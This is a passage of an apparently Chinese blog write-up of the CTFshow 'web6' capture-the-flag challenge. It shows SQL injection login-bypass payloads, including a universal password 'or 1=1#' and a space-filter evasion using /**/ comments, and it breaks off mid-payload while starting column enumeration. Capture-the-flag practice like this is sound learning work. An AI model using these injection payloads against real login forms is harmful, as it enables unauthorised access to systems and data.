CTFSHOW web6
进入题目,发现页面和之前的web2一样,试试看万能密码登陆:username=admin' or 1=1#&password=123不出所料,万能钥匙还是被ban了,试试看过滤了什么测试发现,题目过滤了空格,那么我们就用/**/来绕过空格:username=admin'/**/or/**/1=1#&password=123发现可以成功登陆,接下来老方法,测试有几个数据库:username=admin'/**/or/**/1=1/**/order/**.
原创
2022-03-23 19:40:14 ·
5189 阅读 ·
1 评论